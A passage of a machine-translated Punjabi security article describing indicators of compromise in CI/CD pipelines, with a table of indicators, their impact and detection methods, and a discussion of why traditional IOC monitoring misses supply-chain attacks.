- An SBOM ਦਸਤਖਤ ਨਾ ਕੀਤੇ ਕਲਾਕ੍ਰਿਤੀਆਂ ਦਿਖਾ ਰਿਹਾ ਹੈ।
ਅਸਰ: ਇਮਾਨਦਾਰੀ ਅਸਫਲਤਾਵਾਂ ਦਾ ਮਤਲਬ ਅਕਸਰ ਛੇੜਛਾੜ, ਰਜਿਸਟਰੀ ਜ਼ਹਿਰ, ਜਾਂ ਮਾਲਵੇਅਰ ਟੀਕਾ ਲਗਾਉਣਾ ਹੁੰਦਾ ਹੈ।
ਖੋਜ: ਦਸਤਖਤ ਜਾਂਚਾਂ ਨੂੰ ਸਵੈਚਾਲਿਤ ਕਰੋ, ਚੈੱਕਸਮ ਪ੍ਰਮਾਣਿਕਤਾ ਨੂੰ ਲਾਗੂ ਕਰੋ, ਅਤੇ ਦਸਤਖਤ ਨਾ ਕੀਤੇ ਹਿੱਸਿਆਂ ਨੂੰ ਬਲੌਕ ਕਰੋ। ਸਭ ਤੋਂ ਵੱਧ, ਹਰੇਕ ਅਸਫਲ ਜਾਂਚ ਨੂੰ ਸਮਝੌਤਾ ਦੇ ਸਪੱਸ਼ਟ ਸਬੂਤ ਵਜੋਂ ਮੰਨੋ।
CI/CD ਇੱਕ ਨਜ਼ਰ ਵਿੱਚ ਸਮਝੌਤੇ ਦੇ ਸੰਕੇਤ
| ਸਮਝੌਤਾ ਸੂਚਕ (IOC) | ਵਿੱਚ ਪ੍ਰਭਾਵ CI/CD Pipelines | ਕਿਵੇਂ ਪਤਾ ਲਗਾਇਆ ਜਾਵੇ |
|---|---|---|
| ਸ਼ੱਕੀ ਨਿਰਭਰਤਾ ਬਦਲਾਅ | ਹਮਲਾਵਰ ਪੈਕੇਜ ਮੈਨੇਜਰਾਂ ਵਿੱਚ ਖਤਰਨਾਕ ਲਾਇਬ੍ਰੇਰੀਆਂ ਇੰਜੈਕਟ ਕਰਦੇ ਹਨ, ਜਿਸ ਨਾਲ ਬਿਲਡਜ਼ ਨਾਲ ਸਮਝੌਤਾ ਹੁੰਦਾ ਹੈ। | ਲੌਕਫਾਈਲ ਡਿਫਰੈਂਸ ਨੂੰ ਟ੍ਰੈਕ ਕਰੋ, ਨਿਰਭਰਤਾ ਸਮੀਖਿਆਵਾਂ ਨੂੰ ਲਾਗੂ ਕਰੋ, ਅਤੇ ਨਿਰਭਰਤਾਵਾਂ ਨੂੰ ਲਗਾਤਾਰ ਸਕੈਨ ਕਰੋ। |
| ਬਿਲਡਸ ਵਿੱਚ ਅਸਪਸ਼ਟ ਕੋਡ | ਲੁਕਵੇਂ ਪੇਲੋਡ ਬਿਲਡ ਜਾਂ ਰਨਟਾਈਮ ਦੌਰਾਨ ਬਿਨਾਂ ਕਿਸੇ ਖੋਜ ਦੇ ਚੱਲਦੇ ਹਨ। | ਵਰਤੋ SAST ਅਤੇ ਬੇਸ64, ਹੈਕਸ, ਜਾਂ ਪੈਕਡ ਕੋਡ ਪੈਟਰਨਾਂ ਨੂੰ ਫਲੈਗ ਕਰਨ ਲਈ ਮਾਲਵੇਅਰ ਸਕੈਨਿੰਗ। |
| ਗਿੱਟ ਵਿੱਚ ਭੇਦ ਪ੍ਰਗਟ ਕੀਤੇ ਗਏ | ਲੀਕ ਹੋਏ ਟੋਕਨ ਜਾਂ API ਕੁੰਜੀਆਂ ਹਮਲਾਵਰਾਂ ਨੂੰ ਮਹੱਤਵਪੂਰਨ ਸਿਸਟਮਾਂ ਤੱਕ ਸਿੱਧੀ ਪਹੁੰਚ ਪ੍ਰਦਾਨ ਕਰਦੀਆਂ ਹਨ। | ਗਿੱਟ ਵਿੱਚ ਗੁਪਤ ਸਕੈਨ ਚਲਾਓ hooks ਅਤੇ ਲੀਕ ਹੋਏ ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਨੂੰ ਆਪਣੇ ਆਪ ਰੱਦ ਕਰ ਦੇਵਾਂ। |
| ਛੇੜਛਾੜ ਕੀਤੀ ਗਈ Pipeline ਸੰਰਚਨਾ | ਸੋਧੇ ਹੋਏ ਵਰਕਫਲੋ ਡੇਟਾ ਨੂੰ ਬਾਹਰ ਕੱਢਣ ਜਾਂ ਅੰਦਰ ਰੱਖਣ ਦੀ ਆਗਿਆ ਦਿੰਦੇ ਹਨ CI/CD. | ਪੀਆਰ ਪ੍ਰਵਾਨਗੀਆਂ ਦੀ ਲੋੜ ਹੈ, ਦਸਤਖਤ ਕੀਤੇ ਸੰਰਚਨਾਵਾਂ ਨੂੰ ਲਾਗੂ ਕਰੋ, ਅਤੇ ਨਿਗਰਾਨੀ ਕਰੋ pipeline ਬਦਲਾਅ |
| ਅਧਿਕਾਰਤ IaC ਮੂਲ | ਬਹੁਤ ਜ਼ਿਆਦਾ ਆਗਿਆਕਾਰੀ ਭੂਮਿਕਾਵਾਂ ਜਾਂ ਅਸੁਰੱਖਿਅਤ ਡਿਫਾਲਟ ਕਲਾਉਡ ਵਾਤਾਵਰਣ ਨੂੰ ਬੇਨਕਾਬ ਕਰਦੇ ਹਨ। | ਘੱਟੋ-ਘੱਟ ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰ ਲਾਗੂ ਕਰਨ ਲਈ ਟੈਰਾਫਾਰਮ, ਕੁਬਰਨੇਟਸ ਅਤੇ ਹੈਲਮ ਫਾਈਲਾਂ ਨੂੰ ਸਕੈਨ ਕਰੋ। |
| ਅਸਾਧਾਰਨ ਬਣਤਰ ਵਿਵਹਾਰ | Pipelines ਨੂੰ ਮਾਲਵੇਅਰ ਵੰਡ ਬਿੰਦੂਆਂ ਵਜੋਂ ਜਾਂ ਪਾਸੇ ਦੀ ਗਤੀ ਲਈ ਵਰਤਿਆ ਜਾਂਦਾ ਹੈ। | ਅਚਾਨਕ ਡਾਊਨਲੋਡ, ਪ੍ਰਕਿਰਿਆਵਾਂ, ਜਾਂ ਆਊਟਬਾਊਂਡ ਕਾਲਾਂ ਲਈ ਬਿਲਡ ਲੌਗਸ ਦਾ ਵਿਸ਼ਲੇਸ਼ਣ ਕਰੋ। |
| ਖ਼ਰਾਬ ਪੈਕੇਜ ਸਕ੍ਰਿਪਟਾਂ | ਛੁਪੀਆਂ ਪ੍ਰੀ/ਪੋਸਟ-ਇੰਸਟਾਲ ਸਕ੍ਰਿਪਟਾਂ ਰਨਟਾਈਮ ਟੈਸਟਿੰਗ ਤੋਂ ਪਹਿਲਾਂ ਪੇਲੋਡ ਨੂੰ ਟਰਿੱਗਰ ਕਰਦੀਆਂ ਹਨ। | ਜੋਖਮ ਭਰੀਆਂ npm/PyPI ਸਕ੍ਰਿਪਟਾਂ ਨੂੰ ਬਲੌਕ ਕਰੋ ਅਤੇ ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਨੂੰ ਸੀਮਤ ਕਰੋ CI/CD ਨੌਕਰੀਆਂ |
| ਰਜਿਸਟਰੀ ਜ਼ਹਿਰ | ਟ੍ਰੋਜਨਾਈਜ਼ਡ ਆਰਟੀਫੈਕਟ ਰਜਿਸਟਰੀਆਂ ਵਿੱਚ ਭਰੋਸੇਯੋਗ ਤਸਵੀਰਾਂ ਜਾਂ ਬਾਈਨਰੀ ਦੀ ਥਾਂ ਲੈਂਦੇ ਹਨ। | ਚੈੱਕਸਮ ਦੀ ਪੁਸ਼ਟੀ ਕਰੋ, ਦਸਤਖਤ ਪ੍ਰਮਾਣਿਕਤਾ ਲਾਗੂ ਕਰੋ, ਅਤੇ ਰਜਿਸਟਰੀਆਂ ਨੂੰ ਸਰਗਰਮੀ ਨਾਲ ਸਕੈਨ ਕਰੋ। |
| ਅਸਧਾਰਨ ਵਰਤੋਂਕਾਰ ਗਤੀਵਿਧੀ | ਸਮਝੌਤਾ ਕੀਤੇ ਖਾਤੇ ਖਤਰਨਾਕ ਢੰਗ ਨਾਲ ਧੱਕਦੇ ਹਨ commits ਜਾਂ ਟਰਿੱਗਰ pipelines. | MFA ਲਾਗੂ ਕਰੋ, ਨਿਗਰਾਨੀ ਕਰੋ commitਵਿਗਾੜਾਂ ਲਈ, ਅਤੇ ਵਿਸ਼ਲੇਸ਼ਣ ਕਰੋ login ਪੈਟਰਨ |
| ਅਸਫਲ ਇਮਾਨਦਾਰੀ ਜਾਂ ਦਸਤਖਤ ਜਾਂਚਾਂ | ਛੇੜਛਾੜ ਕੀਤੇ ਕੋਡ, ਨਿਰਭਰਤਾਵਾਂ, ਜਾਂ ਚਿੱਤਰਾਂ ਨੂੰ ਦਰਸਾਉਂਦਾ ਹੈ ਜੋ pipeline. | ਸਵੈਚਾਲਤ ਇਕਸਾਰਤਾ ਜਾਂਚਾਂ ਅਤੇ ਦਸਤਖਤ ਨਾ ਕੀਤੇ ਜਾਂ ਮੇਲ ਨਾ ਖਾਂਦੇ ਹਿੱਸਿਆਂ ਨੂੰ ਬਲੌਕ ਕਰੋ। |
ਪਰੰਪਰਾਗਤ ਆਈਓਸੀ ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਕਿਉਂ ਖੁੰਝ ਜਾਂਦੀ ਹੈ CI/CD ਖ਼ਤਰੇ
ਜ਼ਿਆਦਾਤਰ ਸੰਗਠਨ ਪਹਿਲਾਂ ਹੀ ਸਰਵਰਾਂ, ਕੰਪਿਊਟਰਾਂ, ਜਾਂ ਨੈੱਟਵਰਕਾਂ 'ਤੇ ਸਮਝੌਤਾ ਦੇ ਸੂਚਕਾਂ ਦੀ ਨਿਗਰਾਨੀ ਕਰਦੇ ਹਨ। ਹਾਲਾਂਕਿ, IOC ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਲਈ ਇਹ ਕਲਾਸਿਕ ਪਹੁੰਚ ਅਣਡਿੱਠ ਕਰਦੀ ਹੈ CI/CD pipelines, ਜੋ ਕਿ ਹੁਣ ਸਭ ਤੋਂ ਮਹੱਤਵਪੂਰਨ ਹਮਲੇ ਵਾਲੀਆਂ ਸਤਹਾਂ ਵਿੱਚੋਂ ਇੱਕ ਹਨ। ਦਰਅਸਲ, pipelines ਵਿਲੱਖਣ ਸਮਝੌਤਾ ਸੰਕੇਤ ਦਿਖਾਉਂਦੇ ਹਨ ਜਿਨ੍ਹਾਂ ਨੂੰ ਰਵਾਇਤੀ ਔਜ਼ਾਰ ਨਹੀਂ ਲੱਭ ਸਕਦੇ।
ਰਵਾਇਤੀ ਸੁਰੱਖਿਆ ਵਿੱਚ ਸਮਝੌਤਾ ਦੇ ਸੰਕੇਤ
ਰਵਾਇਤੀ IOC ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਵਿੱਚ, ਆਮ ਤੌਰ 'ਤੇ ਧਿਆਨ ਇਸ ਗੱਲ 'ਤੇ ਹੁੰਦਾ ਹੈ:
- ਅਜੀਬ logins ਜਾਂ IP ਪਤੇ ਜੋ ਚੋਰੀ ਹੋਏ ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਦਾ ਸੁਝਾਅ ਦਿੰਦੇ ਹਨ।
- ਸ਼ੱਕੀ ਫਾਈਲ ਹੈਸ਼ ਜਾਂ ਰਜਿਸਟਰੀ ਬਦਲਾਅ ਜੋ ਮਾਲਵੇਅਰ ਦਾ ਖੁਲਾਸਾ ਕਰਦੇ ਹਨ।
- ਅਣਕਿਆਸਿਆ ਬਾਹਰ ਜਾਣ ਵਾਲਾ ਟ੍ਰੈਫਿਕ ਜੋ ਡੇਟਾ ਐਕਸਫਿਲਟਰੇਸ਼ਨ ਵੱਲ ਇਸ਼ਾਰਾ ਕਰਦਾ ਹੈ।
ਇਹ ਜਾਣੇ-ਪਛਾਣੇ ਸੰਕੇਤਕ ਹਨ ਜਿਨ੍ਹਾਂ ਨੂੰ ਵਿੱਚ ਵੀ ਟਰੈਕ ਕੀਤਾ ਗਿਆ ਹੈ MITER ATT&CK ਫਰੇਮਵਰਕ, ਜੋ ਆਮ ਵਿਰੋਧੀ ਵਿਵਹਾਰਾਂ ਅਤੇ ਰਣਨੀਤੀਆਂ ਦਾ ਨਕਸ਼ਾ ਬਣਾਉਂਦਾ ਹੈ। ਇਹ ਉਪਯੋਗੀ ਸੰਕੇਤ ਹਨ। ਹਾਲਾਂਕਿ, ਇਹ ਮੁੱਖ ਤੌਰ 'ਤੇ ਓਪਰੇਟਿੰਗ ਸਿਸਟਮਾਂ ਜਾਂ ਕਾਰਪੋਰੇਟ ਨੈੱਟਵਰਕਾਂ 'ਤੇ ਲਾਗੂ ਹੁੰਦੇ ਹਨ। ਨਤੀਜੇ ਵਜੋਂ, ਉਹ ਸਾਫਟਵੇਅਰ ਸਪਲਾਈ ਚੇਨ ਵਿੱਚ ਪਹਿਲਾਂ ਹੋਣ ਵਾਲੀ ਸੂਖਮ ਛੇੜਛਾੜ ਨੂੰ ਯਾਦ ਕਰਦੇ ਹਨ।
ਇਸੇ CI/CD Pipelineਵੱਖ-ਵੱਖ ਹਨ
CI/CD pipelines ਸਵੈਚਾਲਿਤ ਵਾਤਾਵਰਣ ਹਨ ਜਿੱਥੇ ਡਿਵੈਲਪਰ commit ਕੋਡ, ਪੁੱਲ ਡਿਪੈਂਡੈਂਸੀ, ਅਤੇ ਰੀਲੀਜ਼ ਬਿਲਡ। ਹਮਲਾਵਰ ਜਾਣਦੇ ਹਨ ਕਿ ਇੱਥੇ ਇੱਕ ਸਮਝੌਤਾ ਹਰੇਕ ਤੈਨਾਤੀ ਵਿੱਚ ਕੈਸਕੇਡ ਹੁੰਦਾ ਹੈ। ਇਸ ਅਨੁਸਾਰ, ਵਿੱਚ ਸਮਝੌਤਾ ਦੇ ਸੰਕੇਤ ਕੀ ਹਨ? CI/CD pipelineਉਹ ਬਹੁਤ ਵੱਖਰੇ ਦਿਖਾਈ ਦਿੰਦੇ ਹਨ:
- ਇੱਕ ਖਤਰਨਾਕ ਨਿਰਭਰਤਾ ਚੁੱਪ-ਚਾਪ package.json ਜਾਂ requirements.txt ਵਿੱਚ ਜੋੜੀ ਗਈ।
- Git ਵਿੱਚ API ਕੁੰਜੀਆਂ ਜਾਂ ਟੋਕਨ ਪ੍ਰਗਟ ਹੋਏ commits ਜਾਂ .env ਫਾਈਲਾਂ।
- npm ਜਾਂ PyPI ਪੈਕੇਜਾਂ ਵਿੱਚ ਅਣਜਾਣ ਕੋਡ ਲਗਾਇਆ ਗਿਆ।
- ਟੈਰਾਫਾਰਮ ਜਾਂ ਕੁਬਰਨੇਟਸ ਫਾਈਲਾਂ ਜਿਨ੍ਹਾਂ ਵਿੱਚ ਅਸੁਰੱਖਿਅਤ ਡਿਫਾਲਟ ਹਨ ਜਿਵੇਂ ਕਿ ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰ: ਸੱਚ।
- Pipeline ਡੇਟਾ ਨੂੰ ਬਾਹਰ ਕੱਢਣ ਜਾਂ ਬੈਕਡੋਰ ਖੋਲ੍ਹਣ ਲਈ ਸੰਪਾਦਿਤ ਨੌਕਰੀਆਂ।
ਇਹ ਸਮਝੌਤਾ ਸੰਕੇਤ ਇਸ ਵਿੱਚ ਹਨ CI/CD ਅਦਿੱਖ ਰਹਿਣਾ standard ਸੁਰੱਖਿਆ ਸਾਧਨ।
ਆਈਓਸੀ ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਵਿੱਚ ਪਾੜਾ
ਹਾਲਾਂਕਿ ਬਹੁਤ ਸਾਰੀਆਂ ਟੀਮਾਂ ਸਮਝੌਤਾ ਦੇ ਸੂਚਕਾਂ ਦੇ ਮੁੱਲ ਨੂੰ ਸਮਝਦੀਆਂ ਹਨ, ਫਿਰ ਵੀ ਉਹ ਸਿਰਫ਼ ਸਰਵਰਾਂ ਅਤੇ ਨੈੱਟਵਰਕ ਲੌਗਾਂ ਤੋਂ ਖੋਜ 'ਤੇ ਨਿਰਭਰ ਕਰਦੀਆਂ ਹਨ। ਇਸ ਲਈ, ਹਮਲਾਵਰ ਆਮ ਨਿਸ਼ਾਨਾਂ ਨੂੰ ਛੱਡੇ ਬਿਨਾਂ ਬਿਲਡਾਂ ਨੂੰ ਜ਼ਹਿਰ ਦੇ ਸਕਦੇ ਹਨ ਜਾਂ ਮਾਲਵੇਅਰ ਪਾ ਸਕਦੇ ਹਨ। ਇਹੀ ਕਾਰਨ ਹੈ ਕਿ XZ Utils ਬੈਕਡੋਰ ਜਾਂ ਖਤਰਨਾਕ npm ਪੈਕੇਜ ਵਰਗੀਆਂ ਘਟਨਾਵਾਂ ਦਾ ਉਤਪਾਦਨ ਤੱਕ ਪਹੁੰਚਣ ਤੱਕ ਪਤਾ ਨਹੀਂ ਲੱਗ ਸਕਿਆ।
ਇਸ ਤਰ੍ਹਾਂ ਦੇ ਸਪਲਾਈ ਚੇਨ ਸਮਝੌਤੇ ਵੀ ਇਹਨਾਂ ਦੁਆਰਾ ਉਜਾਗਰ ਕੀਤੇ ਗਏ ਹਨ CISਏ ਦੀ ਸਪਲਾਈ ਚੇਨ ਸੁਰੱਖਿਆ ਮਾਰਗਦਰਸ਼ਨ, ਜੋ ਚੇਤਾਵਨੀ ਦਿੰਦਾ ਹੈ ਕਿ ਹਮਲਾਵਰ ਵੱਧ ਤੋਂ ਵੱਧ ਨਿਸ਼ਾਨਾ ਬਣਾ ਰਹੇ ਹਨ CI/CD pipelines ਅਤੇ ਰਜਿਸਟਰੀਆਂ।
ਟੇਕਆਉਟ
ਰਵਾਇਤੀ IOC ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਜ਼ਰੂਰੀ ਹੈ ਪਰ ਕਾਫ਼ੀ ਨਹੀਂ ਹੈ। ਸਭ ਤੋਂ ਵੱਧ, ਟੀਮਾਂ ਨੂੰ ਸਮਝੌਤਾ ਦੇ ਸੂਚਕਾਂ ਨੂੰ ਪਛਾਣਨਾ ਚਾਹੀਦਾ ਹੈ CI/CD pipelines. ਕੇਵਲ ਤਦ ਹੀ ਉਹ ਖਤਰਨਾਕ ਕੋਡ ਦਾ ਪਤਾ ਲਗਾ ਸਕਦੇ ਹਨ ਜਾਂ pipeline ਦੁਰਵਿਵਹਾਰ ਨੂੰ ਵਾਤਾਵਰਣ ਵਿੱਚ ਫੈਲਣ ਤੋਂ ਪਹਿਲਾਂ।





